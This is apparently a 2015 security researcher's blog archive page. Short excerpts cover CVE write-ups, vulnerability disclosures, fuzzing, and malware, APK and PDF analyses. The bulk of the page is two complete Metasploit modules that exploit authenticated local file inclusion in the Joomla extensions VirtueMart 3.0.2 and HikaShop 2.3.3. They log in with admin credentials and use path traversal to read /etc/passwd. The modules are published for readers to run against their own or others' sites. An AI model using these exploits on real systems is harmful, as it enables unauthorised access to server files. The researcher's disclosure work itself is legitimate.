Sunday 27 December 2015

Joomla CVE-2015-7857 writeup

(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)


Saturday 26 December 2015

New version of Lime Survey

As far as I know LimeSurvey is already updated, so below you will find all described vulnerabilities I found nearly 2 months ago during some small 'code review' exercises.

Response from LimeSurvey Team was very fast! :)

Found: 4.11.2015
Sent:    5.11.2015
Resp:   5.11.2015

AFAIK all findings were fixed in 48h. So... here we go:

Saturday 24 October 2015

[EN] SOAP testing

During one of last projects I needed to test some webservices.

I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in python...

And that's how I wrote soapee.py:


Friday 2 October 2015

My Java SIGSEGV's

During couple of last days I was checking lcamtuf’s American Fuzzy Lop against some (“non-instrumented”) binaries. 

I was wondering, what will happen if I will run it against Java… ;)

I was looking for some sources, but unfortunately I wasn’t able to find any. Next thing was checking where I have Java installed (so I will know what/where I can check. Kind of ‘test lab’ was: Ubuntu 12, Kali Linux, WinXP, Win7. (Exact version of Java installed on that OS’s you will find below.)

Friday 19 June 2015

[EN] Social engineering attacks during conference in Katowice

Thanks for watching and all questions during this conference ;)

It was a great energy!

More details: http://www.tuv-nord.com/pl/pl/aktualnosci-436-1921.htm

See you next time.


o/


Wednesday 27 May 2015

SQLI in e107 CMS

During last few weeks in the middle of time I was doing also some source code review.
That's how I found sqli bug in admin panel in e107 CMS. After a fast response from e107 Team,
fix was created.

This bug was found in e107_2.0_full_beta1 version. I don't know if other versions are also vulnerable.

Details about the vulnerability (even when it's in admin panel) will not be published for now.

Stay in touch. ;)


Monday 25 May 2015

[EN] Browser exploitation during CybercomDev conference - Updated

During this weekend I gave my first formal security presentation at CybercomDev in Poland.
I was talking about use-after-free exploits, fuzzing and browser exploitation.
Thank you for watching and support ;)


* Currently this presentation is available only on demand.

* Update - 16.07.2015 *
Video (PL) is available here. Thank's Kenis. ;)


See you next time! ;)

o/





Tuesday 28 April 2015

[EN] Old nasm sigsegv 0day

Like before, I wrote another poc to get shell via overflow in old nasm.
Check it out:

[EN] Flex 2.5.33 (2) 0days

I was testing some old bugs in one old distro, and that's how I found sigsegv in flex (2.5.33).

Below is the proof of concept:

Monday 2 March 2015

[EN] Analysing malicious PDF - part 2

This time we will check 2 PDF's (because I decide that it will be more fun than just posting about one ;)). Beside that - those 2 files contains different method for delivering the payload, so we will check all of them.

Sunday 1 March 2015

[EN] Analyzing Malicious PDF

Reading Contagio Blog I found few examples of malicious PDF files.

Today we will check one of them. :)

During PDF analysis many times we will use peepdf and Malzilla.
Also this time, those tool will help us to understand what's going on with
our PDF file.

Let's run peepdf on this file. As we can see there is some JavaScript object.
Let's examine this by "object 7" command:

[EN] Obfuscated case - JSredirector

Today we'll check some "obfuscated" JavaScript code. I found this example (named
'JSredirector')  on this site. Thanks again! ;)

So... Unzip the file and you will find index.html with JS code.


Index.html contains encoded JS code:

Tuesday 24 February 2015

[EN] Malware analysis – Fake AV Downloader (part 1)

1.    Thanks for the sample file(s)

After writing my last article about malware analysis for Android[1], I decide to check some threats that may come from webpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages, “advertisements” added there now, more often probably will try to steal your data by installing some malware on your computer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).

Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog[0]. Thank’s again! ;)

(Hint: Don’t ask me for the password. Ask Mila via email.)

[EN] Fun with American Fu(n)zzy Lop

Last days I was doing a little research about 'how this crazy afl works'.  ;)
"American Fuzzy Lop" it's an excellent tool created by lcamtuf.

Now it's a good moment to check the documentation of 'afl' if you want
some nice details about using it.

Wednesday 28 January 2015

[PL] Analiza aplikacji atticlab.bodyscanner.apk



W tym krótkim poście wyjaśnię sposób w jaki sprawdzałem co robi aplikacja atticlab.bodyscanner.apk. Plik znalazłem przeglądając stronę http://contagiodump.blogspot.com/ [1] - dzięki za próbki!


  
Spis treści:

Sunday 18 January 2015

[EN] kmt.apk - what's this?

Few days ago I found application for android named 'kmt.apk'.

I was wondering, what this app is doing... To check it, I used apktool.

Listing of files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
AndroidManifest.xml

After checking that this app needs my location (or location of my phone),
I was curious, where (all?) those data are going. This is what I found:

jd-gui in action

jd-gui in action - sending params...

jd-gui in action - sending params...

Another one:
onCreate function


And that's how I found this link :)

So it seems that this application is checking information about your localization on your
phone, and sending them to this "erotte" web. For now we're done here. ;)

If you will have some nice APK files to analyse, let me know via email. Thanks.

Cheers,
o/

[EN] Checking Illusion Bot

I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]

Let see...

Download:
You can easily find it on the web





Unzipped it looks like this:

Unzipped

I decide to check webfiles first... but I don't understand all of it... ;]

Sorry - don't understand

So I decide to use nice and friendly 'string' command. Connected with few grep's:

Commands to use for this bot
 Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor is installing itself in the WWW server, or how it's sending commands, etc.

Bots tables
Base64 decoded files, now looks like this:



...and commands again:





Point of view from IDA:




And this is my favourite :D

can you see it? ;)




More, maybe soon. ;)

Cheers,
o/

Monday 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Regarding to last few posts, below you can find another small poc exploit for LFI vulnerability found in latest (this time) VirtueMart (3.0.2).

Because it's for Joomla again, again it's based on HikaShop LFI poc.

Enjoy:

Preparing to exploit...

Raw results

And the code:
---<virtuemart_auth_lfi.rb>---

root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
        'Description' => %q{
                VirtueMart 3.0.2 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                More here: https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery
                                                  # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => ' 23.12.2014'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"

    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_virtuemart',
                 'view'  => 'log',
                 'task'  => 'edit',
                 'logfile'    => readthis
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end

---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

Saturday 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.

Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.

Loading exploit:

Running:





... and finally we will get the content of /etc/passwd:




Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HikaShop - LFI poc for authenticated users',
        'Description' => %q{
                HikaShop 2.3.3 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_hikashop',
                 'ctrl'  => 'view',
                 'task'  => 'edit',
                 'id'    => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end
 
---<hikashop_auth_lfi.rb>---

And pastebin version is here.

Happy New Year! ;)